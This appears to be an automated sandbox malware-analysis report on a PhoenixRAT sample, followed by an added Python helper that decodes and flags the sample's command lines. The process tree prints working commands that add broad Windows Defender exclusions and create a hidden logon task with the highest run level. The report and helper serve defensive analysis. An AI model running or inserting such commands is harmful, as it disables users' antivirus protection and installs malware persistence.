Windows
Analysis Report
dbsJ8HZXYa
Overview
General Information
Detection: PhoenixRAT
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Yara detected PhoenixRAT
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Found strings related to Crypto-Mining
Protects its processes via BreakOnTermination flag
Yara detected Costura Assembly Loader
Encrypted powershell cmdline option found
Machine Learning detection for sample
.NET source code contains potential unpacker
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Potential dropper URLs found in powershell memory
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
dbsJ8HZXYa.exe (PID: 5760, cmdline: C:\Users\user\Desktop\dbsJ8HZXYa.exe, MD5: 73F075ADDA1FE81DEA4022F4E06FB64A)
powershell.exe (PID: 4020, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAeAB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAcwBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAdABkACMAPgA=", MD5: 95000560239032BC68B4C2FDFCDEF913)
  (the -EncodedCommand value is base64 of UTF-16LE and decodes to: <#lxu#>Add-MpPreference <#usb#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#hbs#> -Force <#dtd#> ; the <# #> block comments are no-op padding, so the command adds the user profile and the system drive to the Windows Defender exclusion list)
conhost.exe (PID: 6016, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
Wzhtwkrl.exe (PID: 5156, cmdline: "C:\Users\user\AppData\Local\Temp\Wzhtwkrl.exe", MD5: 12C686D78A0C45F37FD17B743A0609F0)
PhoenixClientbaluci.exe (PID: 1212, cmdline: "C:\Users\user\AppData\Local\Temp\PhoenixClientbaluci.exe", MD5: D6DDA9CB85261B5FDC12EB22C5D3E6DA)
cmd.exe (PID: 3600, cmdline: "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%APPDATA%' & powershell -Command Add-MpPreference -ExclusionPath '%TMP%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%', MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
conhost.exe (PID: 612, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
powershell.exe (PID: 3080, cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming', MD5: 95000560239032BC68B4C2FDFCDEF913)
powershell.exe (PID: 6132, cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp', MD5: 95000560239032BC68B4C2FDFCDEF913)
powershell.exe (PID: 2680, cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows', MD5: 95000560239032BC68B4C2FDFCDEF913)
powershell.exe (PID: 648, cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user', MD5: 95000560239032BC68B4C2FDFCDEF913)
cmd.exe (PID: 4968, cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\user\AppData\Roaming\System\System.exe"' & exit, MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
conhost.exe (PID: 5468, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
schtasks.exe (PID: 1708, cmdline: schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\user\AppData\Roaming\System\System.exe"', MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
cmd.exe (PID: 1244, cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpC0DF.tmp.bat"", MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
conhost.exe (PID: 2424, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
timeout.exe (PID: 5116, cmdline: timeout 3, MD5: EB9A65078396FB5D4E3813BB9198CB18)
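The process tree above shows the three behaviours an analyst has to pull apart by hand in this kind of report: a base64/UTF-16LE -EncodedCommand padded with <# #> block comments, a chain of Add-MpPreference -ExclusionPath calls, and a schtasks /create persistence task pointing into AppData. The following Python triage helper is an added example, not part of the sandbox report or of any tooling the report describes. The three sample command lines are copied from the process tree (PIDs 4020, 3600 and 4968); the regular expressions and the finding wording are my own, and the decoder assumes the UTF-16LE encoding PowerShell itself uses for -EncodedCommand.

```python
"""Triage helpers for sandbox process trees (added example, not part of the
report): decode PowerShell -EncodedCommand payloads, strip <# #> comment
padding, list Defender exclusion paths and parse schtasks persistence."""
import base64
import binascii
import re

# PowerShell accepts abbreviated switch names, so match the usual prefixes.
ENCODED_RE = re.compile(r"-(?:EncodedCommand|enc|ec|e)\b\s+[\"']?([A-Za-z0-9+/=]+)", re.I)
BLOCK_COMMENT_RE = re.compile(r"<#.*?#>", re.S)
# Stay inside one cmd.exe segment (& | ;) so chained calls are reported separately.
EXCLUSION_RE = re.compile(r"Add-MpPreference\b[^&|;]*?-ExclusionPath\s+(\S+)", re.I)
SCHTASKS_CREATE_RE = re.compile(r"\bschtasks(?:\.exe)?\b.*?/create\b", re.I)
SCHTASKS_OPT_RE = re.compile(r"/(sc|rl|tn|tr)\s+('[^']*'|\"[^\"]*\"|\S+)", re.I)

# Command lines copied from the report's process tree (PIDs 4020, 3600, 4968).
PS_ENCODED = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "'
    "PAAjAGwAeAB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAcw"
    "BiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoA"
    "VQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAH"
    'YAZQApACAAPAAjAGgAYgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAdABkACMAPgA="'
)
CMD_EXCLUSIONS = (
    r'"C:\Windows\System32\cmd.exe" /c '
    "powershell -Command Add-MpPreference -ExclusionPath '%APPDATA%' & "
    "powershell -Command Add-MpPreference -ExclusionPath '%TMP%' & "
    "powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & "
    "powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%'"
)
CMD_SCHTASKS = (
    r'"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest '
    r"""/tn "System" /tr '"C:\Users\user\AppData\Roaming\System\System.exe"' & exit"""
)


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def deobfuscate(script):
    """Drop <# ... #> block comments (used here only as padding) and collapse whitespace."""
    return " ".join(BLOCK_COMMENT_RE.sub(" ", script).split())


def defender_exclusions(script):
    """Paths passed to Add-MpPreference -ExclusionPath, expanding @(a,b) arrays."""
    paths = []
    for raw in EXCLUSION_RE.findall(script):
        raw = raw.strip("'\"")
        if raw.startswith("@(") and raw.endswith(")"):
            paths.extend(p.strip("'\" ") for p in raw[2:-1].split(","))
        else:
            paths.append(raw)
    return paths


def schtasks_persistence(cmdline):
    """Schedule, run level, task name and action of a 'schtasks /create', or None."""
    if not SCHTASKS_CREATE_RE.search(cmdline):
        return None
    opts = {k.lower(): v.strip("'\"") for k, v in SCHTASKS_OPT_RE.findall(cmdline)}
    return {
        "schedule": opts.get("sc", "").lower(),
        "runlevel": opts.get("rl", "").lower(),
        "task": opts.get("tn", ""),
        "action": opts.get("tr", ""),
    }


def triage(cmdline):
    """Human-readable findings for one process command line."""
    findings = []
    script = decode_encoded_command(cmdline)
    if script is not None:
        script = deobfuscate(script)
        findings.append("encoded PowerShell decodes to: " + script)
    else:
        script = cmdline
    for path in defender_exclusions(script):
        findings.append("Defender exclusion added for " + path)
    task = schtasks_persistence(cmdline)
    if task:
        flags = []
        if task["schedule"] == "onlogon":
            flags.append("runs at logon")
        if task["runlevel"] == "highest":
            flags.append("highest run level")
        if re.search(r"\\AppData\\", task["action"], re.I):
            flags.append("binary under AppData")
        findings.append(f"scheduled task {task['task']!r} -> {task['action']} ({', '.join(flags)})")
    return findings


if __name__ == "__main__":
    for line in (PS_ENCODED, CMD_EXCLUSIONS, CMD_SCHTASKS):
        for finding in triage(line):
            print(finding)
```

Run against the three lines it prints the decoded Add-MpPreference call with both exclusion paths, the four environment-variable exclusions from the cmd.exe chain, and the "System" logon task with its AppData action and highest run level. The block-comment stripping is deliberately narrow: it removes only the <# #> padding seen in this sample and does not attempt general PowerShell deobfuscation (backtick splitting, string concatenation, -join tricks), which a full decoder would have to handle.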